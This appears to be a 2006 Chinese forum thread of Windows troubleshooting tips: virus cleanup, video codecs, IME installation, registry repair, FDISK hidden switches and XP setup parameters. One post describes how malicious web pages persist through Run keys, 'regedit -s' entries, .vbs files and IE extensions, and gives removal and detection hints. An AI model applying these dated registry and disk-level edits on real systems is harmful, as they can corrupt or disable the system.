这里包括两种情况:本地共享目录和网络中远程共享目录(其中也包括映射盘)。遇到本地共享的目录中的带毒文件不能清除的情况,通常是局域网中别的用户在读写这些文件,杀毒的时候表现为无法直接清除这些带毒文件中的病毒,如果是有病毒在对这些目录在写病毒操作,表现为对共享目录进行清除病毒操作后,还是不断有文件被感染或者不断生成病毒文件。以上这两种情况,都建议取消共享,然后针对共享目录进行彻底查杀,恢复共享的时候,注意不要开放太高的权限,并对共享目录加设密码。对远程的共享目录(包括映射盘)查杀病毒的时候,首先要保证本地计算机的操作系统是干净的,同时对共享目录也有最高的读写权限。如果是远程计算机感染病毒的话,建议还是直接在远程计算机进行查杀病毒。特别的,如果在清除别的病毒的时侯都建议取消所有的本地共享,再进行杀毒操作。在平时的使用中,也应注意共享目录的安全性,加设密码,同时,非必要的情况下,不要直接读取远程共享目录中的文件,建议拷贝到本地检查过病毒后再进行操作。

11、光盘等一些存储介质。

对于光盘上带有的病毒,不要试图直接清除,这是神仙也做不到的事情。同时,对另外一些存储设备查杀病毒的,也需要注意其是否处于写保护或者密码保护状态。

引导型病毒的消毒原理


1.引导型病毒感染时的攻击部位有:
(1)硬盘主引导扇区。
(2)硬盘或软盘的BOOT扇区。
(3)为保存原主引导扇区、BOOT扇区,病毒可能随意地将它们写入其他扇区,而毁坏这些扇区。
(4)引导型病毒发病,执行破坏行为造成种种损坏。

2.硬盘主引导扇区染毒,是可以修复的。
(1)用元毒软盘启动系统。
(2)寻找一台同类型、硬盘分区相同的无毒机器,将其硬盘主引导扇区写入一张软盘中。
(3)将此软盘插入染毒机器,将其中采集的主引导扇区数据写入染毒硬盘,即可修复。

3.硬盘、软盘BOOT扇区染毒也可以修复。
寻找与染毒盘相同版本的无毒系统软盘,执行SYS命令,即可修复。

4.引导型病毒如果将原主引导扇区或BOOT扇区覆盖式写入根目录区,被覆盖的根目录区完全损坏,不可能修复。

5.如果引导型病毒将原主引导扇区或BOOT扇区覆盖式写入第一FAT表时,第二FAT表未破坏,则可以修复。可将第FAT表复制到第一FAT表中。

6.一般而言,引导型病毒占用的其他部分存储空间,只有采用“坏簇”技术和“文件结束簇”技术占用的空间需要收回。

文件型病毒的消毒原理

除了覆盖型的文件型病毒之外,其他感染COM型和EXE型的文件型病毒都可以被清除干净。 因为病毒是在基本保持原文件功能的基础上进行传染的,既然病毒能在内存中恢复被感染文件的代码并予以执行, 则也可以仿照病毒的方法进行传染的逆过程—将病毒清除出被感染文件,并保持其原来的功能。 对覆盖型的文件则只能将其彻底删除,没有挽救原来文件的余地了。

如果已中毒的文件有备份的话,当然是把备份的文件拷贝回去就可以了,如果没有的话就比较麻烦了。 执行文件若加上免疫疫苗的话,遇到病毒的时候,程序可以自行复原;如果文件没有加上任何防护的话, 就只能够靠解毒软件来解,不过用解毒软件来解毒不保证能够完全复原,有可能会越解越糟,杀完毒之后文件反而不能执行。因此,用户必须靠自己平日勤备份自己的资料。

由于某些病毒会破坏系统数据,如目录和文件分配表FAT,因此在清除完计算机病毒之后,系统要进行维护工作。病毒的清除工作与系统的维护工作往往是分不开的。
作者: 语苛经历    时间: 2006-10-23 21:22
视频播放的新问题全面解析





宽带的普及使在线点播视频成为可能,宽带的普及也让曾经备受网友们喜爱的RMVB视频逐渐被DVDRip视频所取代。DVDRip视频以其和DVD相差无几的清晰程度,受到很多影迷的欢迎。不过,由于这种格式需要编码支持,各种编码在不同的工作环境下表现不一,此外还需要字幕外挂工具等的协同工作,因此播放DVDRip格式的影片有时会出现一些奇怪的问题。在本文中,笔者就和大家来谈谈视频播放的新问题及其解决方法。

正确选择编码插件和播放软件

现在的AVI除了最老的Windows就支持的格式外,还有用Divx和Xvid编码及直接用MPEG4压缩成的AVI格式视频。一般来说,高版本Windows媒体播放器已经自动支持MPEG4格式,而且在连线状态下它会自动下载Divx和Xvid的编码。不过Windows媒体播放器8.0以下的版本没有亮度调节功能,很多AVI文件播放时无法选择播放进度,或是选择播放进度后只有声音无图像;9.0版本对AVI格式兼容性要求过高,编码稍微错误的AVI文件就无法播放。

以笔者的经验,用Divx5.1+Xvid+AC3解码(这些插件都可在Shooter.com.cn找到)是最佳组合。建议不要装FFSHOW这类号称一专多能的插件,有时会遇到播放时只有声音,图像变成一大块青色或粉红色块的问题。此外,各种插件编码之间会互相影响——如果你安装了某些编码播放AVI文件时遇到问题,卸载后再安装Divx5.1+Xvid+ AC3,也未必能恢复正常,你可能需要重新安装操作系统。

至于播放软件,由于至今也没一个兼容所有文件格式的软件,因此建议的组合是Windows媒体播放器+第三方播放软件(如金山影霸2003、WinDVD等)。Windows媒体播放器用来播放ASF、WMV等格式的文件,第三方播放软件用来播放RM等其他格式的文件。

正确处理字幕问题

1. 挑选中文字幕

绝大多数DVDRip视频都采用外挂字幕的形式,字幕文件有SRT、SSA、SUB三种格式。SUB是未经OCR识别的字幕,本质还是一串图形,需要IDX文件的支持;SRT和SSA 则是文字格式的字幕,只需要单独一个文件即可使用,文件一般仅有几十KB,便于传播。外挂的字幕文件往往不是纯中文的,有时有英文和中文甚至日文、法文等多种选择,默认情况下一般播放英文字幕。如果你依赖播放软件本身的挑选字幕功能,可能会出现无法正确选择中文字幕的现象。因此,我们应该安装VobSub这个专门的字幕文件工具。

VobSub除了能在播放时自动打开字幕文件外,还具备选择字幕类型的功能。安装VobSub后,播放DVDRip格式的AVI文件时,我们会在任务栏的系统托盘区看见绿色的小图标,用鼠标双击这个小图标打开如图所示的对话框,在“Main”选项卡下的“language”下面,我们可以选择字幕语言。一般简体中文字幕会带有Chinese、cn、gb等字样,而big5、traditional Chinese等则是繁体中文字幕。需要注意的是,字幕文件名称必须和视频文件名称一致,否则播放视频文件时VobSub不会自动播放字幕文件。



2. 解决字幕不同步的问题

由于DVDRip可能是由不同组织用不同的DVD版本做出来的,因此可能会出现字幕不同步的情况。在VobSub中,我们可以切换到“Timing”选项卡,调整第一个对话框中的数值,数值越大,字幕出现的速度就越快,反之则越慢。自己慢慢揣摩适当的比例吧。当然,如果字幕和对白相差太远,建议大家去下载适合当前DVDRip版本的字幕文件。

提示:字幕改了Timing后,应该重新启动播放软件。如果只是暂时停止了播放,可能会发生程序响应极慢或者是死机的现象。



视频播放常见问题分析

不是所有视频文件安装好编码插件后就能一帆风顺地观看下去,有些视频文件源文件亮度就不够,或是用户的显示器使用时间太长,亮度已经下降很多,在这些情况下需要手工调节播放的亮度。

1. 亮度调节、截图等问题

如果你用的是Windows媒体播放器8.0以上版本,可以在播放视频文件时单击“查看→正在播放工具→视频设置”,然后拖动相应的滑块调整画面亮度及色彩等选项(如图)。如果是使用《金山影霸2003》,在播放的时候把鼠标指针移动到屏幕最顶端,就会出现亮度、对比度及色彩的调节选项。当然,你也可以用PowerStrip等专业工具来调节显示的亮度和对比度。



视频文件的截图相对来说比较容易,但由于视频画面是通过DirextX输出的,因此用键盘上的Print Screen功能键无法截取视频画面,我们需要用版本较高的第三方抓图工具,如HyperSnap 4、SnagIt 6等等。

2. 画面倒转了怎么办

有些特殊编码的文件在播放时可能会出现画面倒转的问题(如图2),也有可能是由于该文件没有字幕文件造成的:我们可以把其他文件的字幕复制到这个目录,然后把名称改成相同的,再按上面的操作将字幕出现的速度调快一些,一般就可正常播放了。我们也可以使用播放软件本身支持的画面倒转功能来解决问题:假如我们用的是《金山影霸2003》,可以在播放画面上单击鼠标右键,选择“图像翻转播放”。如果你用的是Windows媒体播放器,且已经开启了VobSub,可以用鼠标右键单击任务栏上系统托盘区的绿色箭头,选择“Flipped Picture”命令即可。

3. 轻松播放RMVB格式文件

我们可以将RMVB格式文件的后缀直接改为RM,当作RM格式来播放。如果更改文件后缀名后无法正确播放,可以下载Real One Player的RMVB升级补丁。《金山影霸2003》也有一个专门的RMVB升级包,安装后就可以直接播放RMVB文件了。

最后要提醒大家的是,最新的软件和编码不一定效果最好,有时会遇上兼容性问题。比如DirectX 9就和部分电视卡有冲突。大家最好根据自己的软、硬件环境来选择配套的播放工具及编码支持,对于必须要Windows Media Player 9才能播放的影片,笔者的建议是安装多操作系统,各自安装不同的播放软件。此外,大家可以多关注射手网(Shooter.com.cn),那上面有最新的编码插件和播放软件。
作者: 语苛经历    时间: 2006-10-23 21:22
在WINXP中安装王码五笔


Windows XP中没有自带王码五笔,对用惯了王码五笔的朋友来说简直就是一场“灾难”,想到有着丰富词汇、方便自造句功能的王码五笔,朋友们是不是梦想着给Windows XP重新插上这个输入的“翅膀”!

  有方法介绍可以利用Office安装盘中输入法安装程序完成王码五笔的安装。但手头上没有Office 2002安装盘的朋友,总不能为一个输入法去买一张Office安装盘吧!那该怎么办呀?笔者以安装王码五笔86版为例,介绍一个“赤手空拳”在Windows XP中进行安装的步骤:

  首先,我们在装好了86版五笔输入法的操作系统中找到这三个文件:Winwb86.mb、Winwb86.ime、Winwb86.emb(自造词句库文件),将它们拷贝带回(文件不大,一张软盘足够了)。

  然后,再把它们拷贝到要安装王码五笔的电脑中的系统目录下(如Windows XP安装在C盘,应为C:windowssystem32)。

  接着另建一个记事本文件,输入如下内容(注意:字母、符号均为英文状态)。

  Windows Registry Editor Version 5.00

  [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlKeyboard LayoutsE0100804]

  “IME File”=“WINWB86.IME”

  “Layout Text”=“中文 (简体) - 王码五笔型86版”

  “Layout File”=“kbdus.dll”

  取名为WUBI,后缀为REG。

  最后,双击WUBI.REG文件,把其导入到注册表中。重启后,到输入法设置中仔细看看,是不是发现可以进行王码五笔的添加啦。
作者: 语苛经历    时间: 2006-10-23 21:23
找回丢失的输入法标志

由于误操作或非正常关机等原因导致任务栏上的输入法标志不见了,这时该怎么办呢?

一般来说,我们打开“控制面板”的“输入法”对话框,将“启动任务栏上的指示器”一项勾上即可解决问题。但有时这样做并没有效果,这时我们可以尝试修改注册表。首先运行“regedit”,展开“HKEY_CURRENT_USER/keyboard/preload”分支,在其下新建一个字符串值,命名为“1”,并将它对应的键值改为“00000409”。最后关闭注册表,重新启动系统就可以了。

另外,系统中的“internat.exe”文件丢失也会导致出现这个问题。我们可以从其他电脑中复制一个相同的文件,把它放入Windows安装目录?如果系统为Win 2000/XP,就放入安装目录下的System32文件夹?,然后运行注册表?展开“HKEY_LOCAL_MACHINE/SoftwareMicrosoft/Windows/CurrentVersion/Run”分支,在右边新建一个字符串值,把键值名和键值都改为“internat.exe”。最后关闭注册表,重新启动系统即可。
作者: 语苛经历    时间: 2006-10-23 21:23
重启时不可忽视的硬盘自检

很多拥有电脑的朋友在Windows死机后,重新启动进入系统时,会吝啬硬盘自检的数秒钟时间而直接跳过。认为硬盘非法关机后重启时的自检程序多余,其实这样很不好,有时一些小毛病也是这样出现的。

前一阵子,笔者在一朋友家中就碰到了一件事。当日朋友一边打“魔兽争霸”,一边用“豪杰音频解霸”听音乐,玩着玩着“魔兽争霸”提示“非法操作”关闭了,然后又出现一提示“OUT OF MEMORY”。一看就知道是由于同时进行两个较大的任务,导致系统资源不足造成的。在重新启动后,朋友嫌费时就跳过了硬盘自检,进入游戏没一会儿,又非法操作了。朋友怀疑是前几日刚更新了显卡的最新驱动程序造成的,重新安装好显卡自带的驱动程序,重启后进入游戏依然故障。后来分析,朋友爱机的内存是256MB的,虚拟内存空间应该不会有问题,那么问题多半是出在了系统交换区空间不足上了。随即进行硬盘查错程序,发现所有逻辑驱动器内都发现了错误。扫描完成后,重启后老老实实的进行了硬盘自检,进入系统后再次进入游戏,问题不再出现。

通过这次故障,我们大家都应该认识到开机时硬盘自检的重要性,不要为了那几秒的时间而给自己的爱机埋下“隐患”。
作者: 语苛经历    时间: 2006-10-23 21:24
注册表损坏之症状和修复

indows的注册表实际上是一个数据库,它包含了五个方面的信息,即PC的全部硬件、软件设置、当前配置、动态状态及用户特定设置等内容,主要储存在C:\windows下的system.dat和user.dat两个文件中。由此可见注册表是Windows系统的命根子,稍有闪失,后果严重。注册表文件损坏而不能正常启动系统或运行应用程序的情况经常出现,那么注册表损坏一般存在哪些症状呢?

1、当使用过去正常工作的程序时,得到诸如“找不到*.dll”的信息,或其他表明程序部分丢失和不能定位的信息。

2、应用程序出现“找不到服务器上的嵌入对象”或“找不到OLE控件”这样的错误提示。

3、当单击某个文档时,Windows给出“找不到应用程序打开这种类型的文档”信息,即使安装了正确的应用程序且文档的扩展名(或文件类型)正确。

4、“资源管理器”页面包含没有图标的文件夹、文件或者意料之外的奇怪图标。

5、“开始”菜单或“控制面板”项目丢失或变灰而处于不可激活状态。

6、网络连接不能建立或不再出现在“拨号网络”中或“控制面板”的“网络”中。

7、不久前工作正常的硬件设备不再起作用或不再出现在“设备管理器”的列表中。

8、Windows系统根本不能启动,或仅能以安全模式或MS-DOS模式启动。

9、Windows系统显示“注册表损坏”这样的信息。

10、启动时,系统调用注册表扫描工具对注册表文件进行检查,然后提示当前注册表已损坏,将用注册表的备份文件进行修复,并要求重新启动系统。而上述过程往往要重复数次才能进入系统。其实此乃系统的误报,此时的注册表并没有损坏,倒是你的内存条或硬盘值得好好检查一下,这是硬件故障造成的假象。

以上罗列了注册表损坏的十种症状,除第十项外,前九项都是可以简单修复的,前提是有注册表文件备份。备份的方法也不难,在机器工作正常时,运行注册表编辑器regedit.exe,选择“注册表/导出注册表文件”,接下来“导出范围”选择“全部”,“存为类型”选择“注册表文件”,最后任取一个文件名(如“backup”)就行了;也可以直接拷贝“system.dat”和“user.dat”两个文件进行备份。修复时进入DOS模式状态(开机时按“F8”调出多重引导菜单,选择“Command Prompt Only”),在提示符后键入“regedit/c backup.reg”回车即可。倘若没有备份,我们可以利用Windows的自动备份进行修复,同样进入DOS实模式状态,键入“scanreg /restore”,进入菜单界面,选择一个备份文件,稍等片刻即可。
作者: 语苛经历    时间: 2006-10-23 21:24
道高一尺,魔高一丈,恶意网页的卑鄙手段可谓是“推陈出新”啊。用一些简单的注册表修复方法后,已经不能完全解决问题了。如果你的注册表在恢复后又回到了被修改的老样子,不妨看看是否是以下原因引起的呢?
  


  1.修改注册表禁止命令形式的修改,目的是不让用户通过注册表修复回去。

  最通常的修改是锁住注册表,还有破坏关联:比如.reg,.vbs,.inf等

  关于解锁注册表,在前面已经介绍了方法,至于被修改关联,只要我前面说的注册表修改的方法里的关联还 能用,就可以用其中的任意一个,但如果.reg,.vbs,.inf都被修改了,怎么办啊?,也不用怕,把 .exe 后缀改为.com后缀,我一样可以编辑注册表,.com也被改了,怎么办?没那么狠吧,行,我再改后缀为.scr 。嘿嘿,一样还可以修改。

  最好的最简单的办法,马上重新启动,按F8进入DOS下,敲入SCANREG/RESTORE,选择以前的正常时的注册表 还原就可以,注意了,一定要选择没被修改时的注册表!如果发现连scanreg都被删除了(一些网站就是这么 狠的,用A盘COPY一个scanreg.exe到COMMAN下即可

  有必要在这里说说常见的文件关联的默认值

  正常的exe关联为[HKEY_CLASSES_ROOT\exefile\shell\open\command]

  默认的键值为:"%1 %*" 将此关联改回去即可使用exe文件

  2.修改注册表后留后门,目的让你修改注册表好像成功,重新启动后又恢复到被修改的状态。

  这主要是在启动项里留了后门,大家可以打开注册表到(也可以用一些工具比如优化大师等来察看)

HKCU\Software\Microsoft\Windows\CurrentVersion\Run
HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce
HKCU\Software\Microsoft\Windows\CurrentVersion\RunServices
HKCU\Software\Microsoft\Windows\CurrentVersionRun-

  看看有没有可疑的启动项目,这一点最多朋友忽略,哪些启动可疑呢?

  我这里给出几个大家需要注意的,启动项里键值有出现.hml和.htm后缀的,最好都去掉,还有有.vbs后缀的 启动项也去掉,还有一个很重要的,如果有这一个启动项,出现有类似键值的,比如:

  system 键值是regedit -s c:\windows……请注意,这个regedit -s 是注册表的一个后门参数,是用来导 入注册表的,这样的选项一定要去掉

  还有一类修改会在c:\windows\产生.vbs后缀的文件,或是.dll文件,其实.dll文件实际是.reg文件(乔装成DLL文件的恶意网页病毒)

  此时你要看看c:\windows\win.ini文件,看看load=,run=,这两个选项后面应该是空的,如果有其他程序 修改load=,run=,将=后面程序删除,删除前看看路径和文件名,删除后在到system下删除对应的文件

  还有一种方法,大家如果屡次修改重启又恢复回去,可以搜索C盘下所有的.vbs文件,可能有隐藏的,用记 事本打开,看到里面有关于修改注册表的都把它删除或保险起见把后缀改掉,你可以按中恶意网页的病毒的 时间来搜索文件

  下面的这个漏洞大家非常值得注意,很多朋友说,你说的方法我都试了,启动项里绝对没有什么可疑的,也没有什么vbs文件,呵呵,大家在启动IE时还有一个陷阱,就是IE主界面的工具的菜单里的广告,一定要去 掉,因为这些会在你启动IE时启动,所以你修改完其他的先别着急打开IE窗口,否则白费力气,方法:打开注册表HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Extensions看到广告就删,别留情!

  一个很重要的问题,在中了恶意网页的陷阱后一定要先清空IE所有临时文件,切记!

  说了那么多,那如何防御这类恶意网页呢?

  一个一劳永逸的方法,把F935DC22-1CF0-11D0-ADB9-00C04FD58A0B这个ID删掉在注册表的路径为HKEY_CLASSES_ROOT\CLSID\{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}

  记住,看清楚了再删除,千万别删错其他。删掉这个F935DC22-1CF0-11D0-ADB9-00C04FD58A0B对系统不会有影响的。

  在IE的选单栏中选择“工具”→“Internet选项”,在弹出的对话框中切换到“安全”标签,选择“ Internet”后点击“自定义级别”按钮,在“安全设置”对话框中,把“ActiveX控件和插件”、“脚本” 中的相关选项全部选择“禁用”或“提示”即可。但如果选择了“禁用”,一些正常使用ActiveX和脚本的 网站可能无法完全显示。建议选择:提示。遇到警告时,看看该网站的原代码,如果发现有出现 Shl.RegWrite等的代码,就不要去了,如果是加密的原代码,不是自己熟悉的网站也不要去,如果连右键都用不了的,也要小心为好(看看原码有什么所谓啊,除非有什么好的JAVA或是恶意代码)

  对于Windows98用户,请打开C:\WINDOWS\JAVA\Packages\CVLV1NBB.ZIP,把其中的“ActiveXComponent.class删掉,对于WindowsMe用户,请打开C:\WINDOWS\JAVA\Packages\5NZVFPF1.ZIP,把其中的“ActiveXComponent.class”删掉,这些删掉不会影响正常浏览网页

  在Windows 2000/XP,可以通过禁用“远程注册表服务”来阻挡部分恶意脚本。具体方法是:在“控制面板”→“管理工具”→“服务”中右键单击“Remote Registry Service”,在弹出选单中选择“属性”,打开属性对话框,在“General”内将“Startup ype”设为“Disabled”。这样也可以拦截部分恶意脚本程序。

  嘿嘿,不用IE。用其他浏览器也可以……大家在中了恶意网页的陷阱后,先不要立即重新启动计算机,到启动项里看看,有没有什么危险的启动项,不如deltree之类的。
作者: 语苛经历    时间: 2006-10-23 21:25
系统相关类


FDISK中隐藏的诱惑

相信大家对FDISK已经非常熟悉了,虽然FDISK有英文界面或不支持大容量硬盘分区等缺点,但是FDISK仍然是许多电脑爱好者的首选分区程序。鉴于分区操作是对磁盘结构的重新划分,具有一定的危险性,所以该程序的全部参数开关并没有全部公布出来,造成FDISK的功能在一定程度上受到了限制。笔者通过长期的资料收集和实践,得到了一部分关于FDISK的未公开参数开关,在此介绍给大家,希望朋友们能更好地利用FDISK。

FDISK程序的命令行格式通用语法为:FDISK /参数开关,下面是它们的具体功能说明:

/ACTOK
参数功能:不检查磁盘表面是否有坏扇区。它可以在硬盘分区时不检测磁盘表面是否有坏区,直接进行分区。

/CMBR
参数功能:重新建立指定磁盘的主引导记录功能说明。其操作等同于/MBR参数,不同之处是可以指定磁盘。

/EXT
参数功能:在当前磁盘上建立扩展分区(用来随后建立逻辑磁盘分区)。

/FPRMT
参数功能:在交互模式下询问FAT16或FAT32的使用。当加上/FPRMT参数时不会出现是否支持大容量硬盘的询问画面,而是在每次建立一个新的分区时询问使用FAT16还是FAT32格式,这样我们就可以更自由地划分每一个盘的格式,当然现在不是很实用了,所以大家看过就是。

/LOG
参数功能:建立磁盘逻辑分区,用/LOG来建立逻辑磁盘,/LOG必须和/EXT同时使用。

/LOGO
参数功能:使用FAT16格式建立磁盘逻辑分区。

/MBR
参数功能:重新建立主磁盘的主引导记录(Master Boot Record)。卸载WindowsNT或Windows2000后消除在主引导记录上记载的系统启动选择;当有病毒感染主引导记录时,用来清除病毒相当有效。

/PRI
参数功能:在磁盘上建立主分区,分区会自动被设定为激活形式。

/PRIO
参数功能:使用FAT16格式建立主分区并设定为激活形式。

/Q
参数功能:使用/Q参数将不用在改变分区表后重新启动计算机,这也是一项比较实用的功能,如果大家还需要在运行FDISK之后运行别的软件,记住用这个参数。

/STATUS
参数功能:当磁盘扩展分区上没有进行逻辑分区时,扩展分区不会被显示出来。

/X
参数功能:使用/X参数将不会产生带有LBA属性的分区。

这些参数中又以/ACTOK,/MBR,/Q 这几个最常用和实用。总的来讲,这些参数会让FDISK程序更全面,但是这些隐藏参数的危险系数也很大,诸位还是要谨慎使用。
作者: 语苛经历    时间: 2006-10-23 21:26
本文介绍了如何在从 Windows NT 4.0 升级至 Windows Server 2003 的计算机上应用注册表“访问控制列表”(ACLs) 和文件系统 ACL。

将基于 Windows NT 4.0 的计算机升级至 Windows Server 2003 时,“Windows 安装程序”不会更改该注册表和文件系统 ACL。Windows Server 2003 允许更高级别的安全性,并且它处理注册表和文件系统权限的方式有别于 Windows NT 4.0。Microsoft 建议您将 Windows 2003 ACL 应用到从 Windows NT 4.0 升级的计算机上。

要应用注册表和文件系统 ACL,您可以使用“安全配置和分析”管理单元。请注意,您必须是“Administrators”组的成员,才能执行此过程。

如何在从 Windows NT 4.0 升级至 Windows Server 2003 的计算机上应用默认的系统安全设置以“Administrator”或“Administrators”组成员的身份登录。

单击开始,单击运行,在打开 框中键入 mmc,然后单击确定。

在文件菜单上,单击“添加/删除管理单元”。

单击添加、“安全配置和分析”、添加,单击关闭,然后单击确定。

在控制台树中,右键单击“安全配置和分析”,然后单击打开数据库。

指定数据库的名称(例如,upgdbase)和位置,然后单击打开。


在屏幕上出现的导入模板 对话框中,单击设置 Security.inf,然后单击打开。

右键单击“安全配置和分析”,然后单击现在分析计算机。

在屏幕上出现的执行分析 对话框中,接受“错误日志文件路径”框中显示的默认日志文件路径,或指定所需的位置,然后单击确定。

将对该模板安全设置与现有的计算机设置进行比较。

备注:此时,不会对计算机进行任何更改。此过程的结果表明模板中的安全设置与实际系统设置有何区别。

完成分析时,展开控制台树中的各个组件,例如:帐户策略、本地策略、事件日志、受限制的组,以及系统服务。

对于在第 10 步中展开的每个组件,请在策略 列的右窗格中查看它的安全属性项,而且要注意以下几点:

带有绿色选中标记的项表示当前计算机设置与数据库中的安全设置相同。

带有红色“x”的项表示当前计算机设置与数据库中的安全设置不同。

如果未显示绿色选中标记或红色“x”,则未在模板中定义此安全属性,并且也没对其进行分析。

如果您要添加或修改数据库设置,请右键单击要添加或修改的安全属性,然后单击属性。单击“在数据库中定义这个策略”复选框,将其选中(如果尚未选中),对策略设置进行所需更改,然后单击确定。

备注:数据库设置 列会显示模板中包含的安全设置,计算机设置 列会显示计算机的当前设置。

要将计算机配置为使用数据库中的安全设置,请右键单击“安全配置和分析”,然后单击现在配置计算机。

在屏幕上出现的配置系统 对话框中,接受默认的路径和日志文件名,或者,键入需要的路径和文件名,然后单击确定。

安全数据库配置会应用于计算机。

备注:如果该数据库项目和计算机上的现有安全配置之间存在冲突,除非您在配置计算机之前消除二者之间的区别,否则将改写现有项目。
作者: 语苛经历    时间: 2006-10-23 21:26
WIN XP 安装参数大揭密

我们先来看看winnt32.exe有哪些参数可以使用。

winnt32.exe位于i386目录里面。这个文件可以直接运行于windows下面,其具体参数有:

安装或升级到 Windows XP。在运行 Windows 95、Windows 98、Windows Me、WindowsNT、Windows 2000 或 Windows XP 的计算机上,可以从命令提示符中运行 winnt32。

语法:

winnt32 [/checkupgradeonly] [/cmd:command_line] [/cmdcons][/copydir:i386folder_name] [/copysource:folder_name] [/debug[level]:[filename]] [/dudisable] [/duprepare:pathname][/dushare:pathname] [/m:folder_name] [/makelocalsource] [/noreboot] [/s:sourcepath][/syspart:drive_letter][/tempdrive:drive_letter] [/udf:id [,UDB_file]] [/unattend[num]:[answer_file]]

参数:

/checkupgradeonly

检查计算机与 Windows XP 的升级兼容性。如果在使用该选项时使用了/unattend,则不需要用户输入。否则,结果将显示在屏幕上,并且可以用您指定的文件名保存它们。默认的文件名为 Upgrade.txt(位于systemroot 文件夹)。

/cmd:command_line

指示安装程序在执行最后阶段的安装前,运行一个特殊的命令。这将在计算机重新启动两次并且“安装程序”收集了必要的配置信息后,以及“安装程序”结束之前发生。

/cmdcons

在运行的计算机上将“故障恢复控制台”作为启动选项安装。恢复控制台是一个命令行界面,可以用它执行诸如启动和停止服务以及访问本地驱动器(包括 NTFS 格式的驱动器)这样的任务。只有在常规安装完毕后,才可以使用 /cmdcons 选项。

/copydir:i386folder_name

在安装 Windows XP 文件的文件夹内另外创建一个文件夹。文件夹名是指您为保存对站点所进行的修改而创建的文件夹。例如,您可以在安装程序的 i386 源文件夹中创建名为 Private_drivers 的文件夹,用来存放驱动程序文件。然后,您可以键入 /copydir:i386Private_drivers 让安装程序将该文件夹复制到新安装的计算机上,并建立新的文件夹位置 systemrootPrivate_drivers。还可以使用/copydir 命令创建任意多个其他的文件夹。

/copysource:folder_name

在安装 Windows XP 文件的文件夹内另外创建一个临时文件夹。文件夹名是指您为保存对站点所进行的修改而创建的文件夹。例如,您可以在安装程序的源文件夹中创建名为 Private_drivers 的文件夹,用来存放驱动程序文件。然后,您可以键入 /copysourcerivate_drivers 以使安装程序将该文件夹复制到最新安装的计算机上,并在安装期间使用它的文件,从而建立临时文件夹位置systemrootPrivate_drivers。还可以使用 /copysource 命令创建任意多个其他的文件夹。与 /copydir 创建的文件夹不同,/copysource 创建的文件夹在安装完成后即被删除。



/debug[level]:[filename]在指定等级处创建调试日志,例如,/debug4ebug.log。默认日志文件为:systemrootWinnt32.log,并且默认调试等级为 2。日志等级如下所示:0 -- 严重错误、1 -- 错误、2 -- 警告、3 -- 通知、4 -- 用于调试的详细信息。每个级别都在其下包括一些子级别。


/dudisable

禁用“动态更新”。没有“动态更新”,安装程序仅能在初始安装文件下运行。即使使用应答文件并在该文件中指定“动态更新”选项,该选项仍会禁用“动态更新”。

/dushare:pathname

将以前从 Windows Update 网站下载的“动态更新”文件(更新的文件在安装时使用)的目录指定为共享。当从安装共享处运行并使用 /duprepare 时,该选项将执行准备操作,这样,经过更新的文件才能在基于网络的客户端安装中使用。如果没有使用/duprepare 并且在客户端上运行,则指定客户端安装将使用位于 pathname 所指定的共享位置的更新文件。

/duprepare

进行安装共享准备,使从 Windows Update 网站下载的“动态更新”文件可以使用它。然后,该共享可用于多个客户端的 Windows XP 安装。只能与 /dushare 一起使用。

/m:folder_name

指定“安装程序”从备用位置复制替换文件。指导“安装程序”首先在备用位置中查看,如果有文件显示,则应使用这些文件而非默认位置中的文件。

/makelocalsource

指示安装程序将所有的安装源文件复制到本地硬盘上。当采用从光盘安装时,使用/makelocalsource 可以在以后没有光盘的情况下,为计算机提供安装文件。



/noreboot

指导“安装程序”在结束文件复制阶段之后不重新启动计算机,这样您就可以执行另一个命令。

/s:sourcepath

指定 Windows XP 文件的源位置。要同时从多个服务器复制文件,请多次键入

/s:sourcepath 选项(最多八次)。如果输入多次选项,则所指定的第一个服务器必须是可用的,否则“安装程序”失败。

/syspart:drive_letter

表明可以将安装启动文件复制到一个硬盘上,并将硬盘标记为活动,然后将该磁盘安装到其他计算机上。启动该计算机时,它将自动启动下一阶段的安装。但必须始终同时使用 /tempdrive 参数和 /syspart 参数。在运行 Windows NT 4.0、Windows 2000 或 Windows XP 的计算机上,可以使用/syspart 选项来启动 Winnt32。运行 Windows 95、Windows 98 或 Windows Me 的计算机不能使用该选项。

/tempdrive:drive_letter

指导安装程序将临时文件放置到指定部分。对于全新安装, 可以将 Windows XP 安装在指定的分区。对于升级安装,/tempdrive 选项仅影响临时文件的位置,而操作系统的升级则在运行 winnt32 的分区中进行。

/udf:id [,UDB_file]

指出安装程序用来指定“唯一数据库”(UDB) 文件如何修改应答文件的标识符 (id)(请参阅 /unattend 项)。UDF 会覆盖应答文件中的一些值,且标识符会决定使用 UDF 中的哪些值。例如,/udf:RAS_user,Our_company.udb 会覆盖Our_company.udb 文件中为 RAS_user 标识符指定的一些设置。如果没有指定 UDF_file,安装程序会提示用户插入一张含有Unique.udb 文件的磁盘。

/unattend

以无人参与的安装模式升级 Windows 98 或 Windows Me 以前的版本。因为所有用户设置都可以从上一次安装中获得,所以在安装过程中并不需要用户干预。

/unattend[num]:[answer_file]

在无人参与安装模式下执行干净安装。所指定的应答文件为安装程序提供了您自定义的设置信息。Num 是在安装程序结束复制这些文件与重新启动计算机之间间隔的秒数。在运行Windows 98、Windows Me、Windows NT、Windows 2000 或 Windows XP 的任何计算机上都可以使用 num 选项。如果使用 /unattend 命令行选项来自动完成安装程序,则表示您已经阅读和接受了Windows XP 的 Microsoft 许可协议。在代表某个组织而不是您自己使用该命令行选项来安装 Windows XP 之前,您必须确认最终用户(无论是个人还是单个实体)已经接收、阅读并接受 Windows XP 的 Microsoft 许可协议的条款。OEM 在销售给最终用户的机器上可能不会指定此值。
作者: 语苛经历    时间: 2006-10-23 21:27
WIN XP的十八般武艺

Windows XP里有我们常用到的工具如磁盘清理程序等等,那么它们到底叫什么名字,又躲在硬盘的哪个地方呢?笔者这就把它们挖掘出来,以后大家再用这些工具的时候就不用一步一步地去找地方了,直接点击“开始→运行”,再输入程序名就OK了。

1.磁盘清理大师——Cleanmgr

用来自动地释放出一部分硬盘空间,并会智能化地进行删除操作。

2.剪贴板查看器——Clipbrd

Windows XP中的剪贴板查看器程序较原先Windows 9X/Me的旧版本多出了共享功能,通过设置权限允许其他网上用户将该剪贴板装入使用。

3.控制面板启动器——Control

快速启动控制面板。

4.Windows XP的诊断医生——Drwtsn32

